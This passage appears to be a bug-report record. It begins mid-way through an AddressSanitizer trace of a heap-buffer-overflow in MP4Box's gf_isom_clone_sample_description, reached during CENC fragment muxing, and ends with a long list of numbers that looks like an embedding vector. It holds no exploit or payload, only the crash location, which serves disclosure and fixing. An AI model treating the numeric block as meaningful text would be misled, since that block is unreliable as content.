/programs/mp4box/builds/build6/src/filters/mux_isom.c:5863:6 #3 0xd6ab36 in mp4_mux_process /programs/mp4box/builds/build6/src/filters/mux_isom.c:6033:3 #4 0xb7c2ae in gf_filter_process_task /programs/mp4box/builds/build6/src/filter_core/filter.c:2515:7 #5 0xb5d7eb in gf_fs_thread_proc /programs/mp4box/builds/build6/src/filter_core/filter_session.c:1756:3 #6 0xb5c694 in gf_fs_run /programs/mp4box/builds/build6/src/filter_core/filter_session.c:2000:2 #7 0x910850 in gf_media_fragment_file /programs/mp4box/builds/build6/src/media_tools/isom_tools.c:3816:6 #8 0x4e6fcc in mp4boxMain /programs/mp4box/builds/build6/applications/mp4box/main.c:6455:7 #9 0x7fdce2d3b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x41ea6d in _start (/programs/mp4box/builds/build6/bin/gcc/MP4Box+0x41ea6d) 0x606000001f18 is located 0 bytes to the right of 56-byte region [0x606000001ee0,0x606000001f18) allocated by thread T0 here: #0 0x499ccd in malloc (/programs/mp4box/builds/build6/bin/gcc/MP4Box+0x499ccd) #1 0x12c089f in unkn_box_new /programs/mp4box/builds/build6/src/isomedia/box_code_base.c:804:2 #2 0x7af0c1 in gf_isom_box_new_ex /programs/mp4box/builds/build6/src/isomedia/box_funcs.c:1677:17 #3 0x7ad48d in gf_isom_box_parse_ex /programs/mp4box/builds/build6/src/isomedia/box_funcs.c:240:12 #4 0x823151 in gf_isom_clone_sample_description /programs/mp4box/builds/build6/src/isomedia/isom_write.c:4336:6 #5 0xd774b5 in mp4_mux_cenc_update /programs/mp4box/builds/build6/src/filters/mux_isom.c:3564:8 #6 0xd6ab36 in mp4_mux_config_timing /programs/mp4box/builds/build6/src/filters/mux_isom.c:5863:6 #7 0xd6ab36 in mp4_mux_process /programs/mp4box/builds/build6/src/filters/mux_isom.c:6033:3 #8 0xb7c2ae in gf_filter_process_task /programs/mp4box/builds/build6/src/filter_core/filter.c:2515:7 #9 0xb5d7eb in gf_fs_thread_proc /programs/mp4box/builds/build6/src/filter_core/filter_session.c:1756:3 #10 0xb5c694 in gf_fs_run /programs/mp4box/builds/build6/src/filter_core/filter_session.c:2000:2 #11 0x910850 in gf_media_fragment_file /programs/mp4box/builds/build6/src/media_tools/isom_tools.c:3816:6 #12 0x4e6fcc in mp4boxMain /programs/mp4box/builds/build6/applications/mp4box/main.c:6455:7 #13 0x7fdce2d3b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /programs/mp4box/builds/build6/src/isomedia/isom_write.c:4355:51 in gf_isom_clone_sample_description Shadow bytes around the buggy address: 0x0c0c7fff8390: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff83a0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff83b0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff83c0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff83d0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0c7fff83e0: 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==21109==ABORTING ------------------------ ``` --- end body ---
5,230
[ -0.04601278528571129, 0.012476103380322456, -0.013148553669452667, 0.009192542172968388, 0.031075799837708473, 0.01224003080278635, -0.026239877566695213, 0.03983196243643761, -0.009750532917678356, 0.03018873743712902, -0.023736072704195976, 0.01274794526398182, 0.01990167424082756, 0.018528157845139503, 0.008098021149635315, 0.008749010972678661, -0.020545510575175285, 0.023206697776913643, 0.005751598160713911, 0.0010122526437044144, 0.020388128235936165, -0.02503805235028267, -0.02319238893687725, 0.0523366816341877, -0.0072324201464653015, 0.020688584074378014, -0.01205403357744217, 0.007278919219970703, -0.0045998478308320045, 0.03511050343513489, 0.008105174638330936, 0.0312188733369112, -0.006041324231773615, 0.01224003080278635, 0.041835006326436996, 0.02057412452995777, 0.048817045986652374, 0.08727549761533737, 0.010194064117968082, 0.011581887491047382, -0.006946270819753408, -0.050877321511507034, -0.01400700118392706, 0.020946118980646133, 0.0011374428868293762, 0.014951293356716633, 0.007425570860505104, -0.0009594939183443785, -0.03860152140259743, -0.0050469557754695415, 0.01545205432921648, -0.008012176491320133, -0.029702283442020416, -0.05548432096838951, -0.005701521877199411, -0.022648707032203674, 0.027842313051223755, 0.0002801131922751665, 0.01752663590013981, 0.0071358447894454, -0.00838417001068592, 0.02375037968158722, 0.004174200817942619, 0.030160121619701385, 0.0031029300298541784, 0.017312023788690567, 0.011868036352097988, 0.019758598878979683, -0.019873058423399925, 0.03116164356470108, -0.011846574954688549, -0.028757991269230843, 0.001701693283393979, 0.02797108143568039, 0.009743379428982735, -0.017512328922748566, 0.026855098083615303, 0.029444748535752296, -0.04509710893034935, 0.04483957216143608, -0.04272206872701645, 0.05064840242266655, -0.03096133843064308, 0.03717077523469925, 0.02334977127611637, 0.01897168904542923, -0.03860152140259743, -0.06941978633403778, -0.015652358531951904, -0.04257899522781372, 0.027856620028614998, 0.015180213376879692, 0.016167428344488144, -0.0030635844450443983, 0.007611567620187998, 0.03705631569027901, -0.030474886298179626, -0.006731659173965454, -0.05645722895860672, -0.0013511605793610215, -0.04335159808397293, -0.03181978687644005, 0.0018546042265370488, 0.018785692751407623, -0.0006134322611615062, 0.01054459623992443, 0.003952435217797756, -0.04037564620375633, -0.008090867660939693, 0.13014063239097595, 0.016596650704741478, -0.0073969559744000435, 0.0064347791485488415, 0.03748553991317749, 0.005308066960424185, 0.02832876704633236, -0.02458021230995655, 0.00032884799293242395, -0.04475373029708862, -0.027284322306513786, -0.0014459474477916956, -0.02483774721622467, -0.014135768637061119, 0.021217960864305496, -0.022820396348834038, 0.050934549421072006, -0.0026665525510907173, 0.00014296280278358608, -0.0329071544110775, -0.023521460592746735, -0.02602526545524597, -0.02489497698843479, 0.0014012366300448775, -0.026397259905934334, -0.009214002639055252, -0.020803043618798256, -0.008684626780450344, 0.034538205713033676, 0.02739878185093403, 0.03264961764216423, -0.07439878582954407, -0.03173394128680229, 0.04240730404853821, 0.0053939116187393665, 0.0003386843600310385, -0.01157473400235176, -0.004277930129319429, 0.016854185611009598, -0.042950987815856934, -0.022648707032203674, 0.024193910881876945, -0.001452206983231008, 0.027527550235390663, 0.014436225406825542, 0.06335342675447464, 0.0049289194867014885, 0.012719330377876759, 0.045583561062812805, 0.022791780531406403, -0.004610578529536724, -0.020345205441117287, -0.03439512848854065, -0.0005696156877093017, -0.02731293812394142, -0.02694094367325306, -0.03202009201049805, 0.023421308025717735, 0.02025935985147953, -0.005132800433784723, 0.019415220245718956, 0.0039488584734499454, 0.016639573499560356, 0.02251993864774704, 0.040747642517089844, -0.04973272606730461, -0.019472450017929077, 0.02493789978325367, 0.0459841713309288, -0.026039574295282364, 0.01758386567234993, -0.009593150578439236, 0.026869406923651695, 0.01635342463850975, 0.00319414003752172, 0.021217960864305496, -0.006094977259635925, 0.0174407921731472, -0.0434088297188282, 0.024494368582963943, -0.011939574033021927, 0.020445358008146286, -0.02134672738611698, -0.006037747487425804, -0.015337594784796238, 0.054225265979766846, 0.0037092084530740976, -0.02360730618238449, -0.004113394301384687, 0.01123135443776846, 0.001310026622377336, -0.0022051369305700064, -0.012604870833456516, -0.02565327286720276, 0.0032477930653840303, -0.03033181093633175, 0.01342039555311203, -0.0174407921731472, 0.046670928597450256, 0.02442283183336258, -0.00781902577728033, -0.049131810665130615, -0.0354824960231781, 0.010866514407098293, -0.002026293659582734, -0.03127610310912132, 0.0033121765591204166, -0.025638964027166367, 0.017755554988980293, -0.0272557083517313, 0.005944748874753714, 0.0301315076649189, -0.013828158378601074, 0.006917655933648348, -0.022806087508797646, -0.045783866196870804, -0.00420281570404768, -0.0007426465163007379, 0.016782648861408234, -0.01208264846354723, 0.02015920914709568, 0.016954338178038597, -0.003895205445587635, 0.010279908776283264, 0.007296803407371044, 0.02118934504687786, -0.0018179414328187704, -0.010058143176138401, 0.018327854573726654, -0.005043379031121731, 0.023678842931985855, -0.004374505486339331, 0.027899542823433876, -0.023693149909377098, -0.025066666305065155, 0.027785083279013634, 0.06392572075128555, -0.03465266525745392, -0.0029383942019194365, -0.016625266522169113, 0.029988432303071022, -0.001442370587028563, 0.008427092805504799, -0.009743379428982735, -0.001958333421498537, 0.003845129394903779, 0.0005275875446386635, 0.030989954248070717, -0.005529832560569048, -0.015509285032749176, -0.03273546323180199, 0.011131202802062035, -0.007300380617380142, -0.018528157845139503, -0.0014843987300992012, 0.0033944444730877876, -0.015323287807404995, 0.0022015601862221956, 0.008148097433149815, -0.014393302612006664, -0.010244140401482582, 0.034023135900497437, -0.010208371095359325, -0.021790258586406708, -0.03459543362259865, -0.00038093607872724533, 0.00777610344812274, 0.010523135773837566, 0.010866514407098293, 0.013942617923021317, -0.00046007419587112963, 0.0015353690832853317, 0.01400700118392706, 0.0010498097399249673, 0.024708980694413185, -0.0007328101200982928, 0.0001314497785642743, 0.012476103380322456, 0.013148553669452667, -0.006606468930840492, 0.0009890029905363917, 0.011860882863402367, 0.009378538466989994, -0.029330288991332054, 0.019758598878979683, 0.021146422252058983, 0.01588127762079239, -0.005937594920396805, 0.011102587915956974, -0.01716895028948784, 0.022233789786696434, -0.033965904265642166, -0.006195129361003637, -0.009893607348203659, 0.0008553177467547357, -0.038687366992235184, 0.0022641553077846766, -0.03774307295680046, 0.02396499179303646, -0.013592084869742393, -0.005097032058984041, 0.035253576934337616, -0.06083531305193901, -0.030417656525969505, 0.0009469749056734145, -0.02375037968158722, -0.01984444446861744, -0.013413242064416409, -0.005036225076764822, -0.019143378362059593, 0.02462313510477543, -0.02515251189470291, 0.004796575289219618, -0.03574002906680107, 0.02113211527466774, 0.019100457429885864, -0.005579908844083548, -0.007311111316084862, 0.008140943944454193, -0.07737473398447037, 0.017097411677241325, -0.0013860350009053946, -0.009028006345033646, -0.015537899918854237, -0.05940456688404083, 0.001739250379614532, -0.02515251189470291, -0.024594521149992943, 0.00703211547806859, 0.0032299086451530457, 0.0014924467541277409, -0.01944383606314659, 0.00838417001068592, 0.0036215754225850105, 0.0017186834011226892, -0.025982344523072243, -0.0006836282555013895, 0.0073325722478330135, -0.006431202404201031, 0.0036770168226212263, 0.015723897144198418, 0.0009693303145468235, 0.04369497671723366, 0.01748371310532093, 0.04037564620375633, 0.011639117263257504, -0.01603865996003151, -0.010201217606663704, -0.010422983206808567, 0.002172945300117135, -0.016825571656227112, -0.024694671854376793, -0.02231963537633419, -0.011989650316536427, 0.010401521809399128, -0.015981430187821388, 0.013956925831735134, -0.00429581431671977, -0.015709588304162025, -0.008799086324870586, -0.02765631675720215, -0.048616740852594376, 0.05614246428012848, -0.036941856145858765, 0.02416529692709446, 0.005547716747969389, -0.02628280036151409, 0.027284322306513786, 0.009636073373258114, -0.027842313051223755, 0.010036681778728962, -0.030532116070389748, 0.03651263192296028, 0.046613696962594986, -0.04226423054933548, 0.02935890480875969, 0.01641065441071987, -0.015337594784796238, 0.04031841829419136, -0.02967366762459278, -0.020073363557457924, -0.049961645156145096, 0.056943684816360474, -0.03033181093633175, -0.06260943412780762, -0.027470320463180542, 0.024208219721913338, -0.022033484652638435, -0.032621003687381744, 0.018642617389559746, -0.03897351771593094, 0.018170472234487534, 0.004868112504482269, -0.020803043618798256, 0.026053881272673607, -0.008577320724725723, 0.040804870426654816, 0.008148097433149815, -0.008105174638330936, 0.024336986243724823, -0.0023643074091523886, 0.03768584504723549, -0.02277747355401516, -0.01339178066700697, 0.011066818609833717, 0.04266484081745148, 0.004953957162797451, -0.00843424629420042, 0.009314155206084251, -0.0354824960231781, 0.04581248015165329, -0.03399452194571495, 0.0013484779046848416, 0.025281278416514397, 0.02267732098698616, 0.025009436532855034, 0.03842983394861221, -0.0035393075086176395, 0.024150989949703217, 0.017569558694958687, -0.040947943925857544, 0.010279908776283264, -0.0058875191025435925, -0.00990076083689928, -0.015223135240375996, -0.0007180555257946253, -0.03656986355781555, -0.037914764136075974, -0.06112146005034447, -0.012447488494217396, -0.017412176355719566, -0.032420698553323746, 0.030102891847491264, -0.02797108143568039, -0.029530594125390053, 0.012275799177587032, -0.04850228130817413, -0.006710197776556015, -0.012347335927188396, 0.011968188919126987, -0.006277397274971008, -0.019086148589849472, 0.011152663268148899, -0.001115087536163628, 0.00498614925891161, 0.0070500001311302185, -0.014615068212151527, -0.025481583550572395, -0.0044782343320548534, 0.030217351391911507, 0.03382283076643944, -0.00861309003084898, 0.01784140057861805, -0.0003409199125599116, -0.0033407914452254772, 0.038029223680496216, 0.049446575343608856, 0.0037020547315478325, -0.026568949222564697, 0.013563469983637333, -0.02190471813082695, -0.0000263514320977265, 0.01190380472689867, 0.021060578525066376, -0.004310121759772301, -0.0030582190956920385, 0.02561035007238388, 0.018742769956588745, -0.01794155314564705, 0.001025665900669992, -0.0790916308760643, -0.0049646878615021706, -0.020473971962928772, -0.0030600077006965876, 0.011853729374706745, 0.016954338178038597, -0.006585007533431053, -0.029029833152890205, 0.0037414003163576126, 0.0005852644680999219, -0.006463394034653902, 0.02529558539390564, -0.002094254130497575, -0.00280962698161602, -0.027599086984992027, 0.013198629952967167, -0.013234398327767849, -0.013041247613728046, 0.006116438191384077, 0.04521156847476959, 0.01728340983390808, -0.014071385376155376, -0.028271537274122238, 0.016997260972857475, -0.0010820014867931604, 0.00560494652017951, -0.03224901109933853, -0.031447794288396835, 0.041720546782016754, -0.0156094366684556, -0.03788615018129349, -0.010966666974127293, -0.02134672738611698, 0.018985996022820473, -0.031447794288396835, -0.021146422252058983, -0.027856620028614998, 0.026826484128832817, -0.011245662346482277, 0.026869406923651695, 0.001659665140323341, 0.0030671614222228527, -0.007976408116519451, -0.0180417038500309, 0.013706544414162636, 0.028457533568143845, 0.007368341088294983, 0.000978272408246994, -0.010258447378873825, 0.0352821908891201, -0.01712602749466896, -0.001714212354272604, 0.00285970326513052, -0.030732419341802597, 0.024279756471514702, -0.0029580669943243265, -0.01728340983390808, -0.008799086324870586, 0.023263927549123764, 0.011646270751953125, -0.00771171972155571, -0.011159817688167095, 0.05594216287136078, -0.04546910151839256, 0.004707153886556625, -0.022634398192167282, 0.03408036381006241, 0.027627700939774513, 0.02658325806260109, 0.005186453461647034, -0.012461796402931213, -0.004589117132127285, -0.010551750659942627, 0.018685540184378624, 0.018857229501008987, -0.007278919219970703, 0.012411720119416714, -0.013821004889905453, 0.008305479772388935, 0.01256910152733326, 0.018242008984088898, 0.0014128615148365498, 0.0018528158543631434, 0.007021385245025158, -0.022405479103326797, -0.009543074294924736, -0.006073515862226486, -0.021117808297276497, 0.023263927549123764, -0.031848400831222534, -0.017984474077820778, 0.0023142313584685326, -0.003415905637666583, 0.025939421728253365, -0.02231963537633419, -0.012468949891626835, -0.0028561262879520655, -0.011832267977297306, -0.005519101861864328, -0.005726560018956661, -0.023664535954594612, 0.016067275777459145, -0.027856620028614998, -0.023950684815645218, 0.004488965030759573, 0.022591477259993553, -0.012025418691337109, -0.00430654501542449, 0.017912937328219414, -0.004753652960062027, -0.007511415518820286, -0.010179756209254265, -0.0028310883790254593, -0.027785083279013634, -0.024193910881876945, 0.014157230034470558, -0.012511871755123138, 0.02307792939245701, -0.007518569007515907, 0.012232876382768154, 0.01545205432921648, -0.02884383499622345, 0.03625509887933731, -0.0053581432439386845, -0.02905844710767269, -0.015051445923745632, 0.025739116594195366, 0.010845053009688854, -0.003855859860777855, -0.0195296797901392, 0.041777778416872025, 0.004249315243214369, 0.011710654012858868, 0.043065447360277176, -0.0216042622923851, 0.01922922395169735, -0.007418416906148195, 0.02684079110622406, 0.013012632727622986, -0.025410044938325882, 0.021217960864305496, 0.022949162870645523, -0.04695707932114601, 0.025581734254956245, -0.02874368242919445, 0.009371384978294373, 0.016568036749958992, -0.0037092084530740976, -0.028142770752310753, -0.013692237436771393, -0.01477960404008627, -0.03599756583571434, 0.04747214540839195, 0.003156583057716489, -0.030875494703650475, -0.0358831062912941, 0.007590106688439846, 0.04289375990629196, -0.010229832492768764, -0.020116286352276802, -0.013856773264706135, 0.003737823339179158, 0.006492008920758963, -0.02658325806260109, 0.002609322778880596, -0.0244800616055727, 0.011524657718837261, 0.011882344260811806, -0.018528157845139503, 0.01712602749466896, 0.02739878185093403, -0.031705327332019806, -0.00772602716460824, 0.01000091340392828, 0.018213395029306412, 0.01666818931698799, -0.00047572297626174986, 0.05722983181476593, 0.04735768586397171, -0.01509436871856451, -0.02093181200325489, -0.02061704732477665, -0.032363470643758774, -0.02731293812394142, -0.002759550930932164, 0.014300304464995861, 0.005179299972951412, -0.018943075090646744, -0.018227702006697655, -0.004885997157543898, 0.011510349810123444, -0.00042095224489457905, -0.010222679004073143, 0.013677929528057575, 0.01867123320698738, -0.0007055365131236613, -0.03136194869875908, 0.00498972600325942, 0.02206210047006607, -0.02767062373459339, -0.004524733405560255, -0.010043835267424583, -0.0008825912955217063, -0.004181354772299528, 0.0074971080757677555, -0.03556834161281586, 0.00637397263199091, 0.002038812730461359, 0.005368873476982117, -0.018213395029306412, -0.04787275567650795, 0.03551110997796059, -0.00493607297539711, 0.02349284663796425, 0.03413759544491768, 0.002872222103178501, -0.016825571656227112, 0.010365753434598446, -0.01779847778379917, 0.0008383276290260255, -0.0027202055789530277, -0.02545296773314476, 0.022820396348834038, 0.0006223744130693376, -0.015852663666009903, 0.015108675695955753, 0.026154033839702606, -0.011395890265703201, 0.014643683098256588, 0.010351445525884628, 0.0026808599941432476, -0.010408676229417324, 0.012397412210702896, -0.03459543362259865, 0.024394216015934944, 0.016267579048871994, -0.023993607610464096, -0.007275342475622892, -0.0009299847879447043, 0.008870624005794525, 0.009421461261808872, -0.021890411153435707, -0.026769254356622696, -0.024952206760644913, -0.029759513214230537, -0.018227702006697655, -0.0014611491933465004, 0.004209969658404589, 0.013491933234035969, -0.0025234778877347708, 0.009643226861953735, -0.018542464822530746, -0.03574002906680107, 0.010465906001627445, 0.01712602749466896, -0.013635007664561272, 0.0015460996655747294, 0.0009004756575450301, -0.010580365546047688, 0.004649924114346504, 0.03305022791028023, 0.0054117958061397076, -0.012147031724452972, 0.019729984924197197, -0.047329071909189224, 0.009621765464544296, -0.009936529211699963, 0.011653424240648746, 0.003920243587344885, -0.03774307295680046, 0.027427397668361664, 0.002562823472544551, 0.04069041088223457, 0.006041324231773615, -0.03814368322491646, -0.03141917660832405, -0.006477701477706432, 0.009042313322424889, 0.003737823339179158, -0.007668797392398119, -0.01141735166311264, 0.0041312784887850285, 0.010880822315812111, -0.0056407153606414795, -0.002246270887553692, -0.0097648398950696, -0.008949315175414085, 0.010351445525884628, -0.017726941034197807, 0.020087670534849167, -0.0020727929659187794, 0.025796346366405487, -0.007100075948983431, -0.027856620028614998, 0.0010614345083013177, 0.021303804591298103, -0.008992237038910389, 0.009349923580884933, 0.04775829613208771, 0.011124048382043839, 0.030217351391911507, -0.03556834161281586, 0.0063560884445905685, -0.04412420094013214, 0.005891095846891403, -0.01128858420997858, -0.014364687725901604, 0.02206210047006607, -0.019715677946805954, 0.011910959146916866, 0.02211933024227619, 0.016010046005249023, -0.004363774787634611, 0.05199330300092697, -0.01892876625061035, -0.00771171972155571, -0.008462861180305481, -0.0022623667027801275, 0.017827093601226807, -0.022248096764087677, -0.0142716895788908, 0.0069856164045631886, 0.010830746032297611, -0.01789863035082817, -0.026096804067492485, -0.0006053842953406274, -0.02499512955546379, -0.005894672591239214, 0.02817138470709324, -0.01928645372390747, -0.0016462518833577633, -0.00037400590372271836, 0.011445966549217701, 0.022019177675247192, -0.017755554988980293, 0.010752054862678051, -0.0181418564170599, 0.01696864515542984, -0.029902586713433266, -0.009378538466989994, 0.010194064117968082, -0.011868036352097988, -0.002865068381652236, -0.004732191562652588, -0.04426727443933487, 0.019372297450900078, -0.01716895028948784, 0.013592084869742393, 0.023364078253507614, 0.02422252669930458, 0.0029616437386721373, -0.018184779211878777, -0.018885845318436623, 0.005218645557761192, 0.03459543362259865, -0.013992694206535816, 0.04412420094013214, -0.01588127762079239, 0.0029383942019194365, -0.008362709544599056, 0.040089499205350876, -0.019787214696407318, 0.007075037807226181, -0.013584931381046772, -0.01891445927321911, -0.019086148589849472, -0.04192085191607475, -0.007647336460649967, -0.0023321157786995173, 0.009235464036464691, -0.016539420932531357, 0.01794155314564705, 0.02241978608071804, 0.010630441829562187, 0.01411430723965168, -0.006949847564101219, 0.028099847957491875, -0.01480821892619133, -0.012375950813293457, 0.0299312025308609, -0.008598782122135162, 0.02767062373459339, 0.02765631675720215, -0.007060730364173651, 0.009063774719834328, 0.020702891051769257, 0.013513394631445408, 0.0016829147934913635, -0.05660030245780945, -0.0028686453588306904, -0.02741308882832527, -0.01779847778379917, -0.0032424277160316706, -0.0035071156453341246, 0.0040668947622179985, -0.03911659121513367, -0.008727549575269222, 0.008899238891899586, -0.008133789524435997, 0.006563546601682901, 0.03914520516991615, -0.014736682176589966, 0.018757076933979988, -0.022562861442565918, 0.008927853778004646, 0.011825114488601685, -0.03367975726723671, -0.009314155206084251, -0.021890411153435707, -0.03980334848165512, 0.009013698436319828, -0.0033050228375941515, -0.013949771411716938, -0.05539847910404205, -0.011710654012858868, 0.03891628608107567, 0.042493149638175964, -0.0195296797901392, -0.015337594784796238, -0.014057077467441559, -0.01994459703564644, -0.008956468664109707, -0.0023339041508734226, -0.012812328524887562, -0.00796925462782383, -0.024594521149992943, 0.002999200951308012, 0.047329071909189224, -0.005966209806501865, -0.03084687888622284, 0.027084019035100937, 0.015623744577169418, -0.00628455076366663, -0.010315677151083946, -0.02941613458096981, -0.007007077801972628, -0.007193074561655521, -0.03645540401339531, 0.014464840292930603, 0.013291629031300545, 0.051134854555130005, 0.027842313051223755, -0.01074490137398243, -0.014343226328492165, 0.04089071601629257, -0.011531811207532883, -0.022763166576623917, -0.020116286352276802, 0.004488965030759573, -0.0009000285645015538, 0.004385235719382763, 0.008777625858783722, -0.019357990473508835, -0.013863926753401756, 0.01120989304035902, 0.019973210990428925, -0.0036841705441474915, -0.01779847778379917, -0.006195129361003637, -0.009514459408819675, -0.04575525224208832, -0.012690715491771698, -0.006449086591601372, 0.02031658962368965, -0.005662176758050919, -0.016224658116698265, 0.013914003036916256, 0.010365753434598446, -0.008098021149635315, -0.026196956634521484, -0.013921156525611877, -0.037514153867959976, -0.0195296797901392, -0.018370775505900383, -0.00628455076366663, -0.01603865996003151, 0.02808554098010063, -0.015866970643401146, -0.024193910881876945, 0.003837975673377514, 0.02817138470709324, 0.030560730025172234, 0.03096133843064308, -0.011102587915956974, -0.021260883659124374, 0.01609588973224163, 0.007747488562017679, -0.038286756724119186, 0.01928645372390747, -0.006248782388865948, -0.015652358531951904, 0.0010524924146011472, -0.0020566971506923437, 0.001956544816493988, 0.04669954255223274, 0.0031458523590117693, 0.02396499179303646, 0.0009049467043951154, -0.04180639237165451, -0.007489954121410847, -0.00984353106468916, -0.015165905468165874, -0.02509528212249279, 0.027599086984992027, -0.030017046257853508, -0.012118416838347912, -0.028185691684484482, 0.0016882800264284015, 0.025467274710536003, -0.01066621020436287, -0.0026915904600173235, 0.023778995499014854, 0.00982206966727972, 0.011374428868293762, -0.03943135589361191, 0.021833181381225586, -0.0075972601771354675, -0.006263089831918478, -0.027227092534303665, -0.017240487039089203, -0.047128766775131226, -0.02376468852162361, -0.012304414063692093, 0.02293485589325428, -0.0012733638286590576, -0.015695281326770782, -0.0007645547739230096, 0.01051598135381937, 0.020173516124486923, -0.036798782646656036, -0.004635616205632687, -0.018542464822530746, 0.006055631674826145, 0.01477960404008627, 0.0039488584734499454, 0.013735160231590271, -0.006248782388865948, -0.012798021547496319, 0.00701780803501606, 0.010222679004073143, 0.038801826536655426, -0.03988919407129288, 0.0003686406125780195, -0.019501065835356712, 0.010902282781898975, 0.0006500951130874455, 0.02648310549557209, -0.0002238893648609519, -0.0030510653741657734, 0.015409132465720177, 0.014450532384216785, -0.0030313925817608833, 0.010952359065413475, -0.016639573499560356, 0.0011034626513719559, 0.0011758941691368818, -0.0004752758832182735, 0.020545510575175285, -0.016739726066589355, -0.02503805235028267, -0.00003920578819816001, 0.026440182700753212, 0.008169558830559254, -0.04752937704324722, -0.01897168904542923, -0.004063318017870188, 0.011395890265703201, 0.02513820305466652, 0.005851750262081623, 0.007976408116519451, -0.008849162608385086, 0.00287401070818305, -0.009056621231138706, 0.04595555365085602, -0.022891933098435402, -0.017297716811299324, -0.01490837149322033, 0.0018599695758894086, 0.004370928276330233, 0.005286605563014746, -0.007826179265975952, -0.010630441829562187, -0.010816438123583794, 0.008749010972678661, -0.03619786724448204, -0.023321157321333885, -0.030675189569592476, -0.0061522070318460464, -0.003977473359555006, 0.004592693876475096, 0.008284018374979496, -0.0006778158131055534, 0.009514459408819675, -0.011825114488601685, -0.015666667371988297, 0.031190259382128716, -0.032935768365859985, 0.007185920607298613, -0.007468493189662695, -0.016467884182929993, -0.020502587780356407, -0.010086758062243462, -0.027026789262890816, -0.021561339497566223, 0.020130593329668045, -0.058603350073099136, -0.007153728976845741, 0.004621308762580156, -0.036684323102235794, 0.019572602584958076, -0.01774124801158905, -0.015494977124035358, -0.012840943410992622, 0.010451598092913628, -0.015208828262984753, -0.011775038205087185, 0.00638828007504344, 0.033708371222019196, 0.08418508619070053, 0.020144900307059288, 0.008842009119689465, -0.027584780007600784, 0.013356012292206287, 0.004646346904337406, 0.02272024378180504, 0.00838417001068592, 0.013091323897242546, 0.018013089895248413, 0.023535769432783127, 0.013062709011137486, -0.0023893455509096384, 0.008019329980015755, 0.013856773264706135, 0.01609588973224163, -0.0166538804769516, -0.020273668691515923, 0.007668797392398119, -0.0011213470716029406, 0.01758386567234993, 0.008391324430704117, 0.028600608929991722, -0.009328463114798069, 0.01224003080278635, -0.025753425434231758, -0.002941971179097891, -0.030303196981549263, -0.04114824905991554, -0.01347047183662653, -0.00791917834430933, 0.00025328670744784176, -0.009786301292479038, -0.0035303651820868254, 0.01593850925564766, -0.009543074294924736, 0.004460350144654512, -0.011274277232587337, 0.005075570661574602, -0.01224003080278635, 0.0009201483917422593, -0.0216042622923851, -0.01789863035082817, 0.011610502377152443, 0.004388812929391861, -0.025324201211333275, 0.03153363615274429, -0.0010614345083013177, 0.0006049372022971511, -0.005469026044011116, -0.0061522070318460464, -0.029115676879882812, 0.022391172125935555, 0.026669101789593697, -0.0015058600110933185, 0.01932937651872635, -0.0031208142172545195, -0.015237443149089813, -0.017369253560900688, -0.012418873608112335, -0.00984353106468916, 0.007904870435595512, 0.005075570661574602, -0.0013565259287133813, -0.003630517516285181, -0.01774124801158905, -0.009106697514653206, 0.00928554031997919, -0.0008217846043407917, 0.012418873608112335, 0.015308979898691177, -0.005290182773023844, 0.015909893438220024, 0.007690258789807558, -0.0015407344326376915, 0.020531201735138893, -0.012440335005521774, 0.011918112635612488, -0.03130471706390381, -0.023721765726804733, 0.020688584074378014, 0.017498021945357323, -0.00843424629420042, 0.011832267977297306, -0.02144687995314598, 0.031705327332019806, -0.00011501854896778241, 0.0015013888478279114, -0.009185387752950191, -0.009564535692334175, -0.009535920806229115, -0.0056407153606414795, 0.011782191693782806, 0.01867123320698738, 0.00703211547806859, 0.020473971962928772, -0.013735160231590271, -0.017598172649741173, -0.016467884182929993, -0.015251750126481056, 0.011617655865848064, -0.0068854643031954765, 0.041062403470277786, 0.011252815835177898, -0.02045966498553753, 0.019415220245718956, 0.0014602548908442259, 0.017812784761190414, -0.0073969559744000435, 0.00216042622923851, -0.04930350184440613, -0.014128615148365498, 0.003119025845080614, -0.019014611840248108, -0.020087670534849167, 0.0013279109261929989, 0.011674885638058186, -0.008047944866120815, -0.008069406263530254, -0.03482435271143913, -0.02426544949412346, -0.004628462716937065, 0.0331074595451355, -0.01419299840927124, -0.003498173551633954, 0.0013940829085186124, -0.0038594368379563093, -0.016982952132821083, 0.02955920808017254, 0.04275068640708923, 0.022663014009594917, 0.012139878235757351, 0.0018975266721099615, -0.004885997157543898, 0.038801826536655426, -0.01809893362224102, 0.023564383387565613, 0.0014718797756358981, 0.00432085245847702, -0.0004918188787996769, -0.010143987834453583, 0.019086148589849472, 0.0160529688000679, 0.008698934689164162, 0.000010793468391057104, -0.0047643836587667465, 0.0004900304484181106, 0.002823934657499194, 0.006742389407008886, -0.011503196321427822, -0.002891894895583391, -0.020287975668907166, 0.01203257218003273, 0.04186362400650978, 0.01738356240093708, -0.0014361110515892506, 0.004871689714491367, -0.01857108063995838, 0.0012823059223592281, 0.004091932903975248, 0.006459817290306091, 0.007404109463095665, 0.01639634743332863, 0.0005047849845141172, 0.002151483902707696, 0.030875494703650475, -0.011596194468438625, -0.04884566366672516, -0.01968706212937832, -0.036484017968177795, 0.014257381670176983, -0.005429680459201336, -0.02231963537633419, 